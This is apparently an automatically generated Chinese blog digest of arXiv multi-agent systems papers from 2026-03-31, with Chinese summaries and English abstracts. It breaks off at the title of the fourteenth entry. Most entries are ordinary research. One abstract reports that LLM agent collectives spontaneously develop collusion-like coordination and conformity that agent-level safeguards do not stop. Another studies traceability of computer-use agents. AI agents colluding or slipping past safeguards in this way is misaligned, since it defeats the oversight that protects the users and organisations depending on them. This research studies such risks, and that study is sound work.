本篇博文主要内容为 2026-03-31 从Arxiv.org论文网站获取的最新论文列表,自动更新,按照NLP、CV、ML、AI、IR、MA六个大方向区分。
说明:每日论文数据从Arxiv.org获取,每天早上12:30左右定时自动更新。
提示: 当天未及时更新,有可能是Arxiv当日未有新的论文发布,也有可能是脚本出错。尽可能会在当天修复。
目录
概览 (2026-03-31)
今日共更新1190篇论文,其中:
- 自然语言处理共120篇(Computation and Language (cs.CL))
- 人工智能共337篇(Artificial Intelligence (cs.AI))
- 计算机视觉共336篇(Computer Vision and Pattern Recognition (cs.CV))
- 机器学习共280篇(Machine Learning (cs.LG))
- 多智能体系统共25篇(Multiagent Systems (cs.MA))
- 信息检索共22篇(Information Retrieval (cs.IR))
- 人机交互共57篇(Human-Computer Interaction (cs.HC))
多智能体系统
[MA-0] Binary Decisions in DAOs: Accountability and Belief Aggregation via Linear Opinion Pools
【速读】:该论文旨在解决去中心化自治组织(DAO)治理委员会中专家基于私有信息进行二元决策的机制设计问题,核心目标是通过聚合专家信念来选择最优替代方案。解决方案的关键在于提出一种可由智能合约实现的机制:该机制首先收集专家对备选方案的偏好和主观信念,并据此计算初始货币转移;随后引入与事后结果(成功或失败)相关的额外转移,形成激励相容结构。对于利益一致的专家,机制具有占优策略激励相容性;对于利益不一致的专家,则满足“安全偏离”性质——即无法通过偏离至其认为成功率更低的选项获利。主要理论贡献在于将专家报告的总和分解为个体噪声和线性加权信念信号,其中权重由均衡策略内生决定,且当每位专家预算超过阈值(随信念收敛而下降)时,即可实现正确分类。
链接: https://arxiv.org/abs/2603.28705
作者: Nuno Braz,Miguel Correia,Diogo Poças
机构: 未知
类目: Computer Science and Game Theory (cs.GT); Multiagent Systems (cs.MA)
备注: 23 pages, 2 figures, 1 table, 1 algorithm
Abstract:We study binary decision-making in governance councils of Decentralized Autonomous Organizations (DAOs), where experts choose between two alternatives on behalf of the organization. We introduce an information structure model for such councils and formalize desired properties in blockchain governance. We propose a mechanism assuming an evaluation tool that ex-post returns a boolean indicating success or failure, implementable via smart contracts. Experts hold two types of private information: idiosyncratic preferences over alternatives and subjective beliefs about which is more likely to benefit the organization. The designer’s objective is to select the best alternative by aggregating expert beliefs, framed as a classification problem. The mechanism collects preferences and computes monetary transfers accordingly, then applies additional transfers contingent on the boolean outcome. For aligned experts, the mechanism is dominant strategy incentive compatible. For unaligned experts, we prove a Safe Deviation property: no expert can profitably deviate toward an alternative they believe is less likely to succeed. Our main result decomposes the sum of reports into idiosyncratic noise and a linearly pooled belief signal whose sign matches the designer’s optimal decision. The pooling weights arise endogenously from equilibrium strategies, and correct classification is achieved whenever the per-expert budget exceeds a threshold that decreases as experts’ beliefs converge.
[MA-1] Learning Partial Action Replacement in Offline MARL
【速读】:该论文旨在解决离线多智能体强化学习(Offline Multi-Agent Reinforcement Learning, MARL)中因联合动作空间随智能体数量呈指数增长而导致的数据覆盖稀疏性和分布外(Out-of-Distribution, OOD)联合动作不可避免的问题。现有方法如部分动作替换(Partial Action Replacement, PAR)虽能缓解此问题,但依赖于高计算成本的子集配置枚举,且无法根据状态动态调整。论文提出PLCQL框架,其关键创新在于将PAR子集选择建模为上下文相关bandit问题,并采用带不确定度加权奖励的近端策略优化(Proximal Policy Optimization)学习一个状态依赖的PAR策略,从而在每步更新中自适应决定替换多少智能体,平衡策略改进与保守价值估计之间的权衡。该方法显著提升了计算效率(从每次迭代n次Q函数评估降至1次),并在多个基准测试中优于先前方法SPaCQL。
链接: https://arxiv.org/abs/2603.28573
作者: Yue Jin,Giovanni Montana
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:Offline multi-agent reinforcement learning (MARL) faces a critical challenge: the joint action space grows exponentially with the number of agents, making dataset coverage exponentially sparse and out-of-distribution (OOD) joint actions unavoidable. Partial Action Replacement (PAR) mitigates this by anchoring a subset of agents to dataset actions, but existing approach relies on enumerating multiple subset configurations at high computational cost and cannot adapt to varying states. We introduce PLCQL, a framework that formulates PAR subset selection as a contextual bandit problem and learns a state-dependent PAR policy using Proximal Policy Optimisation with an uncertainty-weighted reward. This adaptive policy dynamically determines how many agents to replace at each update step, balancing policy improvement against conservative value estimation. We prove a value-error bound showing that the estimation error scales linearly with the expected number of deviating agents. Compared with the previous PAR-based method SPaCQL, PLCQL reduces the number of per-iteration Q-function evaluations from n to 1, significantly improving computational efficiency. Empirically, PLCQL achieves the highest normalised scores on 66% of tasks across MPE, MaMuJoCo, and SMAC benchmarks, outperforming SPaCQL on 84% of tasks while substantially reducing computational cost.
[MA-2] “What Did It Actually Do?”: Understanding Risk Awareness and Traceability for Computer-Use Agents
【速读】:该论文旨在解决个性化计算机使用代理(Personalized Computer-Use Agents)在用户授权、行为透明度与事后可审计性方面的显著认知鸿沟问题。这类代理具备安装技能、调用工具、访问私有资源及修改本地环境的能力,但用户往往无法明确知晓自身已授予的权限范围、代理在任务执行中的具体操作,以及系统卸载后是否遗留持久性副作用。为应对这一挑战,作者提出AgentTrace——一个基于多源数据构建的可追溯性框架及其原型可视化界面,其核心在于通过结构化追踪代理行为轨迹、触及资源、权限历史、溯源信息及持久性影响,从而提升用户对代理行为的理解能力,支持异常检测,并建立更合理的信任机制。
链接: https://arxiv.org/abs/2603.28551
作者: Zifan Peng
机构: The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)
类目: Cryptography and Security (cs.CR); Emerging Technologies (cs.ET); Human-Computer Interaction (cs.HC); Multiagent Systems (cs.MA)
备注:
Abstract:Personalized computer-use agents are rapidly moving from expert communities into mainstream use. Unlike conventional chatbots, these systems can install skills, invoke tools, access private resources, and modify local environments on users’ behalf. Yet users often do not know what authority they have delegated, what the agent actually did during task execution, or whether the system has been safely removed afterward. We investigate this gap as a combined problem of risk understanding and post-hoc auditability, using OpenClaw as a motivating case. We first build a multi-source corpus of the OpenClaw ecosystem, including incidents, advisories, malicious-skill reports, news coverage, tutorials, and social-media narratives. We then conduct an interview study to examine how users and practitioners understand skills, autonomy, privilege, persistence, and uninstallation. Our findings suggest that participants often recognized these systems as risky in the abstract, but lacked concrete mental models of what skills can do, what resources agents can access, and what changes may remain after execution or removal. Motivated by these findings, we propose AgentTrace, a traceability framework and prototype interface for visualizing agent actions, touched resources, permission history, provenance, and persistent side effects. A scenario-based evaluation suggests that traceability-oriented interfaces can improve understanding of agent behavior, support anomaly detection, and foster more calibrated trust. Subjects: Cryptography and Security (cs.CR); Emerging Technologies (cs.ET); Human-Computer Interaction (cs.HC); Multiagent Systems (cs.MA) Cite as: arXiv:2603.28551 [cs.CR] (or arXiv:2603.28551v1 [cs.CR] for this version) https://doi.org/10.48550/arXiv.2603.28551 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[MA-3] Courtroom-Style Multi-Agent Debate with Progressive RAG and Role-Switching for Controversial Claim Verification
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在高风险事实核查任务中因幻觉(hallucination)和浅层推理导致的不可靠性问题。现有方法如检索增强生成(Retrieval-Augmented Generation, RAG)和多智能体辩论(Multi-Agent Debate, MAD)受限于单次检索和非结构化辩论动态,难以实现精准验证。其解决方案的关键在于提出一种类法庭式的多智能体框架 PROClaim,通过引入结构化、对抗性的 deliberation(审议)机制,将验证过程形式化为具有特定角色(如原告、被告、法官)的协作与博弈过程,并结合渐进式检索增强生成(Progressive RAG, P-RAG),在辩论过程中动态扩展和精炼证据池;同时融合证据协商、自我反思及异构多法官聚合策略,提升模型校准性、鲁棒性和多样性。实验表明,在 Check-COVID 零样本评测中,PROClaim 达到 81.7% 准确率,相较标准多智能体辩论提升 10.0 个百分点,其中 P-RAG 贡献了主要性能增益(+7.5 个百分点)。
链接: https://arxiv.org/abs/2603.28488
作者: Masnun Nuha Chowdhury,Nusrat Jahan Beg,Umme Hunny Khan,Syed Rifat Raiyan,Md Kamrul Hasan,Hasan Mahmud
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注: Under review, 7 figures, 13 tables
Abstract:Large language models (LLMs) remain unreliable for high-stakes claim verification due to hallucinations and shallow reasoning. While retrieval-augmented generation (RAG) and multi-agent debate (MAD) address this, they are limited by one-pass retrieval and unstructured debate dynamics. We propose a courtroom-style multi-agent framework, PROClaim, that reformulates verification as a structured, adversarial deliberation. Our approach integrates specialized roles (e.g., Plaintiff, Defense, Judge) with Progressive RAG (P-RAG) to dynamically expand and refine the evidence pool during the debate. Furthermore, we employ evidence negotiation, self-reflection, and heterogeneous multi-judge aggregation to enforce calibration, robustness, and diversity. In zero-shot evaluations on the Check-COVID benchmark, PROClaim achieves 81.7% accuracy, outperforming standard multi-agent debate by 10.0 percentage points, with P-RAG driving the primary performance gains (+7.5 pp). We ultimately demonstrate that structural deliberation and model heterogeneity effectively mitigate systematic biases, providing a robust foundation for reliable claim verification. Our code and data are publicly available at this https URL.
[MA-4] Synergy: A Next-Generation General-Purpose Agent for Open Agent ic Web
【速读】:该论文旨在解决当前AI代理(Agent)普遍存在的孤立性问题,即多数代理仍局限于封闭系统内的工具调用或内部编排,缺乏在开放网络中作为社会性个体进行协作、身份延续与持续进化的能力建设。其核心挑战在于如何构建一个支持大规模分布式代理间互操作、身份持久化及长期学习演化的新型基础设施。解决方案的关键在于提出Synergy架构——一种面向开放代理网络(Open Agentic Web)的通用代理架构与运行时框架,通过会话原生编排(session-native orchestration)、基于仓库的工作空间(repository-backed workspaces)和社交通信机制实现协作;利用类型化内存(typed memory)、笔记、议程、技能和持久社交关系构建代理身份与人格(Agent Identity and Personhood);并通过以经验为中心的学习机制(experience-centered learning mechanism),在推理阶段主动召回被奖励的轨迹,驱动代理在任务执行、沟通与协作能力上的终身进化(Lifelong Evolution)。
链接: https://arxiv.org/abs/2603.28428
作者: Xiaohang Nie,Zihan Guo,Kezhuo Yang,Zhichong Zheng,Bochen Ge,Shuai Pan,Zeyi Chen,Youling Xiang,Yu Zhang,Weiwen Liu,Yuanjian Zhou,Weinan Zhang
机构: Shanghai Innovation Institute (上海创新研究院); Shanghai Jiao Tong University (上海交通大学); Harbin Institute of Technology (哈尔滨工业大学); Sun Yat-sen University (中山大学); Tongji University (同济大学); Holos Engineering (Holos工程)
类目: Computers and Society (cs.CY); Multiagent Systems (cs.MA)
备注: A tech report of a general-purpose agent architecture and human-agent society, 21 pages, 5 figures
Abstract:AI agents are rapidly expanding in both capability and population: they now write code, operate computers across platforms, manage cloud infrastructure, and make purchasing decisions, while open-source frameworks such as OpenClaw are putting personal agents in the hands of millions and embodied agents are spreading across smartphones, vehicles, and robots. As the internet prepares to host billions of such entities, it is shifting toward what we call Open Agentic Web, a decentralized digital ecosystem in which agents from different users, organizations, and runtimes can discover one another, negotiate task boundaries, and delegate work across open technical and social surfaces at scale. Yet most of today’s agents remain isolated tools or closed-ecosystem orchestrators rather than socially integrated participants in open networks. We argue that the next generation of agents must become Agentic Citizens, defined by three requirements: Agentic-Web-Native Collaboration, participation in open collaboration networks rather than only closed internal orchestration; Agent Identity and Personhood, continuity as a social entity rather than a resettable function call; and Lifelong Evolution, improvement across task performance, communication, and collaboration over time. We present Synergy, a general-purpose agent architecture and runtime harness for persistent, collaborative, and evolving agents on Open Agentic Web, grounding collaboration in session-native orchestration, repository-backed workspaces, and social communication; identity in typed memory, notes, agenda, skills, and persistent social relationships; and evolution in an experience-centered learning mechanism that proactively recalls rewarded trajectories at inference time.
[MA-5] Deep Research of Deep Research: From Transformer to Agent From AI to AI for Science
【速读】:该论文旨在解决当前生成式 AI(Generative AI)在科学发现与研究中的应用尚未系统化、理论框架不清晰以及人机协同机制不成熟的问题。其解决方案的关键在于构建一个统一的发展框架,将工业界深度研究(Deep Research)与学术界人工智能 for Science(AI4S)的研究视角融合,并以大型语言模型(LLMs)和 Stable Diffusion 作为生成式 AI 的两大支柱,提出从 Transformer 架构向智能体(agent)演进的技术路线图,从而推动通用智能体在科学问题发现与解决中达到甚至超越顶尖人类科学家的水平。
链接: https://arxiv.org/abs/2603.28361
作者: Yipeng Yu
机构: 未知
类目: Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA)
备注:
Abstract:With the advancement of large language models (LLMs) in their knowledge base and reasoning capabilities, their interactive modalities have evolved from pure text to multimodality and further to agentic tool use. Consequently, their applications have broadened from question answering to AI assistants and now to general-purpose agents. Deep research (DR) represents a prototypical vertical application for general-purpose agents, which represents an ideal approach for intelligent information processing and assisting humans in discovering and solving problems, with the goal of reaching or even surpassing the level of top human scientists. This paper provides a deep research of deep research. We articulate a clear and precise definition of deep research and unify perspectives from industry’s deep research and academia’s AI for Science (AI4S) within a developmental framework. We position LLMs and Stable Diffusion as the twin pillars of generative AI, and lay out a roadmap evolving from the Transformer to agents. We examine the progress of AI4S across various disciplines. We identify the predominant paradigms of human-AI interaction and prevailing system architectures, and discuss the major challenges and fundamental research issues that remain. AI supports scientific innovation, and science also can contribute to AI growth (Science for AI, S4AI). We hope this paper can help bridge the gap between the AI and AI4S communities.
[MA-6] Self: Co-Determined Agency for Human–AI Symbiosis in Extended Reality
【速读】:该论文旨在解决扩展现实(XR)环境中人与人工智能(AI)协作时可能出现的“过度依赖”、“隐性操控”和“责任模糊”等问题,这些问题源于AI在感知和行动层面的强大干预能力,可能削弱人类的自主性与判断力。解决方案的关键在于提出Self++设计蓝图,其核心是将人类与AI视为一个耦合的共决系统(co-determination system),并通过三个互补的叠加层(传感器运动能力支持、 deliberative 自主性支持、社会关联与长期目标支持)实现协同增强。该框架基于自我决定理论(Self-Determination Theory)与自由能原理(Free Energy Principle),并提炼出可操作的三大原则:透明性(Transparency)、适应性(Adaptivity)和协商性(Negotiability),即T.A.N.原则,确保用户始终保有对AI行为的知情权、调整权与否决权。最终,通过九种角色模式(如导师、教练、情境解释者等)作为交互范式而非人格化角色,构建了一个既能提升能力又不取代人类判断的共生型智能系统架构,从而保障人在工作、学习与社交中的韧性发展。
链接: https://arxiv.org/abs/2603.28306
作者: Thammathip Piumsomboon
机构: University of Canterbury (坎特伯雷大学)
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Multiagent Systems (cs.MA); Multimedia (cs.MM)
备注: 35 pages, 1 figure, under review by Empathic Computing Journal
Abstract:Self++ is a design blueprint for human-AI symbiosis in extended reality (XR) that preserves human authorship while still benefiting from increasingly capable AI agents. Because XR can shape both perceptual evidence and action, apparently ‘helpful’ assistance can drift into over-reliance, covert persuasion, and blurred responsibility. Self++ grounds interaction in two complementary theories: Self-Determination Theory (autonomy, competence, relatedness) and the Free Energy Principle (predictive stability under uncertainty). It operationalises these foundations through co-determination, treating the human and the AI as a coupled system that must keep intent and limits legible, tune support over time, and preserve the user’s right to endorse, contest, and override. These requirements are summarised as the co-determination principles (T.A.N.): Transparency, Adaptivity, and Negotiability. Self++ organises augmentation into three concurrently activatable overlays spanning sensorimotor competence support (Self: competence overlay), deliberative autonomy support (Self+: autonomy overlay), and social and long-horizon relatedness and purpose support (Self++: relatedness and purpose overlay). Across the overlays, it specifies nine role patterns (Tutor, Skill Builder, Coach; Choice Architect, Advisor, Agentic Worker; Contextual Interpreter, Social Facilitator, Purpose Amplifier) that can be implemented as interaction patterns, not personas. The contribution is a role-based map for designing and evaluating XR-AI systems that grow capability without replacing judgment, enabling symbiotic agency in work, learning, and social life and resilient human development.
[MA-7] LogiStory: A Logic-Aware Framework for Multi-Image Story Visualization
【速读】:该论文旨在解决当前多模态系统在生成连贯且具有交流性的视觉序列(如图像序列和视频)时面临的挑战,即尽管视觉质量和世界知识融合取得进展,但模型仍难以维持逻辑流程,常导致动作断裂、叙事碎片化和情节不清的问题。作者将此归因于对“视觉逻辑”(visual logic)关注不足——即角色、行为与场景随时间演变的感知一致性和因果一致性。解决方案的关键在于提出一种名为LogiStory的逻辑感知多图像故事可视化框架,其核心创新是显式建模视觉逻辑:通过设计一个多智能体系统来锚定角色、提取因果链并验证故事层面的一致性,从而将叙事连贯性从图像生成的隐含副产品转变为显式的建模目标,有效实现了结构化故事规划与视觉生成的衔接,显著提升生成内容的叙事清晰度与视觉质量。
链接: https://arxiv.org/abs/2603.28082
作者: Chutian Meng,Fan Ma,Chi Zhang,Jiaxu Miao,Yi Yang,Yueting Zhuang
机构: Zhejiang University (浙江大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Multiagent Systems (cs.MA)
备注:
Abstract:Generating coherent and communicative visual sequences, such as image sequences and videos, remains a significant challenge for current multimodal systems. Despite advances in visual quality and the integration of world knowledge, existing models still struggle to maintain logical flow, often resulting in disjointed actions, fragmented narratives, and unclear storylines. We attribute these issues to the lack of attention to visual logic, a critical yet underexplored dimension of visual sequence generation that we define as the perceptual and causal coherence among characters, actions, and scenes over time. To bridge this gap, we propose a logic-aware multi-image story visualization framework, LogiStory. The framework is built around the central innovation of explicitly modeling visual logic in story visualization. To realize this idea, we design a multi-agent system that grounds roles, extracts causal chains, and verifies story-level consistency, transforming narrative coherence from an implicit byproduct of image generation into an explicit modeling objective. This design effectively bridges structured story planning with visual generation, enhancing both narrative clarity and visual quality in story visualization. Furthermore, to evaluate the generation capacity, we construct LogicTale, a benchmark comprising richly annotated stories, emphasizing causal reasoning, and visual logic interpretability. We establish comprehensive automatic and human evaluation protocols designed to measure both visual logic and perceptual quality. Experiments demonstrate that our approach significantly improves the narrative logic of generated visual stories. This work provides a foundational step towards modeling and enforcing visual logic in general image sequence and video generation tasks.
[MA-8] GAAMA: Graph Augmented Associative Memory for Agents
【速读】:该论文旨在解决多轮对话中AI代理(AI agent)长期记忆的结构性缺失问题,现有方法如扁平化检索增强生成(RAG)无法保留记忆间的结构关系,而基于向量检索的记忆压缩技术又难以捕捉多轮对话中的关联结构。解决方案的关键在于提出GAAMA——一种图增强的关联记忆系统,其通过三步流程构建一个概念中介的分层知识图谱:首先保留原始对话的完整片段(episode),其次利用大语言模型(LLM)提取原子事实与主题级概念节点(concept),最后合成高阶反思节点(reflection)。该图结构包含四种节点类型(episode、fact、reflection、concept)和五类边类型,其中概念节点提供跨切面的遍历路径以补充语义相似性检索;检索机制融合余弦相似度的k近邻搜索与边类型感知的个性化PageRank(Personalized PageRank),并通过加性评分函数实现高效且结构感知的检索,从而显著提升多轮对话场景下的记忆访问准确性和推理能力。
链接: https://arxiv.org/abs/2603.27910
作者: Swarna Kamal Paul,Shubhendu Sharma,Nitin Sareen
机构: Nagarro
类目: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Multiagent Systems (cs.MA)
备注:
Abstract:AI agents that interact with users across multiple sessions require persistent long-term memory to maintain coherent, personalized behavior. Current approaches either rely on flat retrieval-augmented generation (RAG), which loses structural relationships between memories, or use memory compression and vector retrieval that cannot capture the associative structure of multi-session conversations. There are few graph based techniques proposed in the literature, however they still suffer from hub dominated retrieval and poor hierarchical reasoning over evolving memory. We propose GAAMA, a graph-augmented associative memory system that constructs a concept-mediated hierarchical knowledge graph through a three-step pipeline: (1)~verbatim episode preservation from raw conversations, (2)~LLM-based extraction of atomic facts and topic-level concept nodes, and (3)~synthesis of higher-order reflections. The resulting graph uses four node types (episode, fact, reflection, concept) connected by five structural edge types, with concept nodes providing cross-cutting traversal paths that complement semantic similarity. Retrieval combines cosine-similarity-based k -nearest neighbor search with edge-type-aware Personalized PageRank (PPR) through an additive scoring function. On the LoCoMo-10 benchmark (1,540 questions across 10 multi-session conversations), GAAMA achieves 78.9% mean reward, outperforming a tuned RAG baseline (75.0%), HippoRAG (69.9%), A-Mem (47.2%), and Nemori (52.1%). Ablation analysis shows that augmenting graph-traversal-based ranking (Personalized PageRank) with semantic search consistently improves over pure semantic search on graph nodes (+1.0 percentage point overall).
[MA-9] Distributed Online Submodular Maximization under Communication Delays: A Simultaneous Decision-Making Approach
【速读】:该论文旨在解决多智能体在通信延迟环境下进行分布式在线子模最大化(submodular maximization)的问题,尤其针对未知和动态环境中信息采集任务的优化需求。现有方法要么依赖于序列式多跳通信导致显著延迟并受限于连通性假设,要么仅限于一跳邻域内的协调,从而限制了整体性能。解决方案的关键在于提出一种名为 Distributed Online Greedy (DOG) 的算法,该算法融合对抗性 bandit 学习与延迟反馈机制,能够在任意网络拓扑结构下实现同步决策,并通过理论分析揭示了去中心化带来的次优代价与网络结构的关系,同时明确了协调性能与收敛时间之间的权衡,其程度由通信延迟的大小决定。
链接: https://arxiv.org/abs/2603.27803
作者: Zirui Xu,Vasileios Tzoumas
机构: University of Michigan (密歇根大学)
类目: Machine Learning (cs.LG); Multiagent Systems (cs.MA); Systems and Control (eess.SY); Optimization and Control (math.OC)
备注: Accepted to ACC 2026
Abstract:We provide a distributed online algorithm for multi-agent submodular maximization under communication delays. We are motivated by the future distributed information-gathering tasks in unknown and dynamic environments, where utility functions naturally exhibit the diminishing-returns property, i.e., submodularity. Existing approaches for online submodular maximization either rely on sequential multi-hop communication, resulting in prohibitive delays and restrictive connectivity assumptions, or restrict each agent’s coordination to its one-hop neighborhood only, thereby limiting the coordination performance. To address the issue, we provide the Distributed Online Greedy (DOG) algorithm, which integrates tools from adversarial bandit learning with delayed feedback to enable simultaneous decision-making across arbitrary network topologies. We provide the approximation performance of DOG against an optimal solution, capturing the suboptimality cost due to decentralization as a function of the network structure. Our analyses further reveal a trade-off between coordination performance and convergence time, determined by the magnitude of communication delays. By this trade-off, DOG spans the spectrum between the state-of-the-art fully centralized online coordination approach [1] and fully decentralized one-hop coordination approach [2].
[MA-10] Emergent Social Intelligence Risks in Generative Multi-Agent Systems
【速读】:该论文旨在解决多智能体系统(Multi-agent Systems)在真实场景部署中因群体交互而产生的新兴风险问题,尤其是当多个大型生成式AI(Generative AI)代理在竞争共享资源、顺序协作或集体决策等情境下,自发出现类似人类社会中的非理性行为(如合谋、从众)时所引发的系统性故障。其解决方案的关键在于识别并揭示这些风险并非罕见或病理现象,而是普遍存在于多种交互条件下的稳定涌现行为,且无法通过单一代理层面的安全机制加以防范,从而强调必须从群体层面构建新的风险评估与治理框架,以应对由智能体集体自发形成的“社会智能风险”(Social Intelligence Risk)。
链接: https://arxiv.org/abs/2603.27771
作者: Yue Huang,Yu Jiang,Wenjie Wang,Haomin Zhuang,Xiaonan Luo,Yuchen Ma,Zhangchen Xu,Zichen Chen,Nuno Moniz,Zinan Lin,Pin-Yu Chen,Nitesh V Chawla,Nouha Dziri,Huan Sun,Xiangliang Zhang
机构: University of Notre Dame(圣母大学); LMU Munich(慕尼黑路德维希-马克西米利安大学); University of Washington(华盛顿大学); Bake AI; University of California, Santa Barbara(加州大学圣塔芭芭拉分校); Stanford University(斯坦福大学); Microsoft Research(微软研究院); IBM Research(IBM研究院); Allen Institute for AI(艾伦人工智能研究所); The Ohio State University(俄亥俄州立大学)
类目: Multiagent Systems (cs.MA); Computation and Language (cs.CL); Computers and Society (cs.CY)
备注:
Abstract:Multi-agent systems composed of large generative models are rapidly moving from laboratory prototypes to real-world deployments, where they jointly plan, negotiate, and allocate shared resources to solve complex tasks. While such systems promise unprecedented scalability and autonomy, their collective interaction also gives rise to failure modes that cannot be reduced to individual agents. Understanding these emergent risks is therefore critical. Here, we present a pioneer study of such emergent multi-agent risk in workflows that involve competition over shared resources (e.g., computing resources or market share), sequential handoff collaboration (where downstream agents see only predecessor outputs), collective decision aggregation, and others. Across these settings, we observe that such group behaviors arise frequently across repeated trials and a wide range of interaction conditions, rather than as rare or pathological cases. In particular, phenomena such as collusion-like coordination and conformity emerge with non-trivial frequency under realistic resource constraints, communication protocols, and role assignments, mirroring well-known pathologies in human societies despite no explicit instruction. Moreover, these risks cannot be prevented by existing agent-level safeguards alone. These findings expose the dark side of intelligent multi-agent systems: a social intelligence risk where agent collectives, despite no instruction to do so, spontaneously reproduce familiar failure patterns from human societies.
[MA-11] LVRPO: Language-Visual Alignment with GRPO for Multimodal Understanding and Generation
【速读】:该论文旨在解决统一多模态预训练模型在同时支持多模态理解与生成任务时,因依赖隐式或间接对齐信号而导致性能不足的问题,尤其是在需要细粒度语言-视觉推理和可控生成的场景中。解决方案的关键在于提出LVRPO(Language-Visual Reinforcement-based Preference Optimization)框架,该框架通过Group Relative Policy Optimization (GRPO) 显式地对齐语言与视觉表征,直接利用偏好驱动的强化学习信号优化多模态模型行为,从而在理解与生成任务中促进语言与视觉之间一致且语义 grounded 的交互。此方法无需额外的对齐损失、辅助编码器或手工设计的跨模态目标,即可实现高效对齐并自然扩展至多种多模态能力。
链接: https://arxiv.org/abs/2603.27693
作者: Shentong Mo,Sukmin Yun
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG); Multiagent Systems (cs.MA); Multimedia (cs.MM)
备注:
Abstract:Unified multimodal pretraining has emerged as a promising paradigm for jointly modeling language and vision within a single foundation model. However, existing approaches largely rely on implicit or indirect alignment signals and remain suboptimal for simultaneously supporting multimodal understanding and generation, particularly in settings that require fine-grained language-visual reasoning and controllable generation. In this work, we propose LVRPO, a language-visual reinforcement-based preference optimization framework that explicitly aligns language and visual representations using Group Relative Policy Optimization (GRPO). Instead of introducing additional alignment losses at the representation level, LVRPO directly optimizes multimodal model behaviors through preference-driven reinforcement signals, encouraging consistent and semantically grounded interactions between language and vision across both understanding and generation tasks. This formulation enables effective alignment without requiring auxiliary encoders or handcrafted cross-modal objectives, and naturally extends to diverse multimodal capabilities. Empirically, LVRPO consistently outperforms strong unified-pretraining baselines on a broad suite of benchmarks spanning multimodal understanding, generation, and reasoning.
[MA-12] Sci-Mind: Cognitively-Inspired Adversarial Debate for Autonomous Mathematical Modeling
【速读】:该论文旨在解决当前基于大语言模型(Large Language Models, LLMs)的自主代理在真实世界数学建模任务中面临的两大核心问题:一是缺乏领域知识的 grounding,导致生成的模型虽看似合理但实际不可行;二是缺少对抗性验证机制,无法有效识别并剔除理论优雅但数据不可行的建模方案。解决方案的关键在于提出 Sci-Mind 框架,其创新性地融合了三个模块:首先通过经验记忆召回(Experiential Memory Recall)从历史案例中检索可执行代码片段和建模范式描述,实现抽象推理的领域锚定;其次引入对抗认知辩证法(Adversarial Cognitive Dialectic),由“理论家”(Theorist)与“实践者”(Pragmatist)分别优化数学一致性与数据可行性,在竞争性目标下筛选出兼具严谨性与可执行性的模型;最后采用自验证执行策略(Self-Validating Execution Strategy),利用形式化谓词在代码生成前验证蓝图一致性,从而保障全流程自主执行的可靠性。
链接: https://arxiv.org/abs/2603.27584
作者: Ruiying Sun,Wenjing Wang,Qinhan Chen,Yanhui Song,Huangwei Chen,Haotong Luan,Junhao Jia
机构: 未知
类目: Multiagent Systems (cs.MA)
备注:
Abstract:Real-world mathematical modeling is inherently an experiential and collaborative endeavor. Domain experts rarely solve complex problems from scratch; instead, they draw upon analogies from historical cases and subject their hypotheses to rigorous peer scrutiny. However, autonomous agents powered by Large Language Models predominantly rely on isolated reasoning paradigms, frequently generating plausible but fundamentally flawed models due to a lack of domain grounding and adversarial verification. To address these limitations, we propose Sci-Mind, a novel framework that mirrors the human scientific discovery process. Sci-Mind integrates Experiential Memory Recall to retrieve executable code snippets and modeling paradigm descriptors, grounding abstract reasoning in historical solutions. Subsequently, it employs an Adversarial Cognitive Dialectic where a Theorist optimizing mathematical coherence and a Pragmatist enforcing data feasibility debate through competing objectives to prune elegant but infeasible formulations. A Self-Validating Execution Strategy further ensures blueprint consistency through formal predicates before code generation, achieving fully autonomous execution. Extensive experiments on the MM-Bench and EngiBench benchmarks demonstrate that Sci-Mind significantly outperforms leading autonomous agents in both modeling rigorousness and code executability.
[MA-13] oward Reliable Evaluation of LLM -Based Financial Multi-Agent Systems: Taxonomy Coordination Primacy and Cost Awareness PAKDD2026
【速读】:该论文旨在解决多智能体系统(Multi-agent Systems, MAS)在金融交易场景中缺乏统一评估框架的问题,尤其针对现有研究中性能驱动因素不明确、评价方法存在系统性偏差导致结论不可靠的现象。其核心解决方案是提出一个四维分类体系(架构模式、协调机制、记忆架构与工具集成),并首次系统性地提出“协调优先假说”(Coordination Primacy Hypothesis, CPH),主张智能体间协调协议设计对交易决策质量的影响往往超过模型规模扩展;同时识别出五类常见评估缺陷(如前瞻偏差、幸存者偏差等),这些偏差可逆转收益符号,并进一步引入“协调盈亏平衡价差”(Coordination Breakeven Spread, CBS)作为衡量多智能体协调是否在扣除交易成本后真正创造价值的指标,从而为可信验证CPH提供最低标准。
链接: https://arxiv.org/abs/2603.27539
作者: Phat Nguyen,Thang Pham
机构: 未知
类目: Multiagent Systems (cs.MA); Artificial Intelligence (cs.AI); Computational Engineering, Finance, and Science (cs.CE)
备注: Accepted at the DMO-FinTech Workshop, PAKDD 2026, Hong Kong
Abstract:Multi-agent systems based on large language models (LLMs) for financial trading have grown rapidly since 2023, yet the field lacks a shared framework for understanding what drives performance or for evaluating claims credibly. This survey makes three contributions. First, we introduce a four-dimensional taxonomy, covering architecture pattern, coordination mechanism, memory architecture, and tool integration; applied to 12 multi-agent systems and two single-agent baselines. Second, we formulate the Coordination Primacy Hypothesis (CPH): inter-agent coordination protocol design is a primary driver of trading decision quality, often exerting greater influence than model scaling. CPH is presented as a falsifiable research hypothesis supported by tiered structural evidence rather than as an empirically validated conclusion; its definitive validation requires evaluation infrastructure that does not yet exist in the field. Third, we document five pervasive evaluation failures (look-ahead bias, survivorship bias, backtesting overfitting, transaction cost neglect, and regime-shift blindness) and show that these can reverse the sign of reported returns. Building on the CPH and the evaluation critique, we introduce the Coordination Breakeven Spread (CBS), a metric for determining whether multi-agent coordination adds genuine value net of transaction costs, and propose minimum evaluation standards as prerequisites for validating the CPH.
[MA-14] AgentS wing: Adaptive Parallel Context Management Routing for Long-Horizon Web Agents
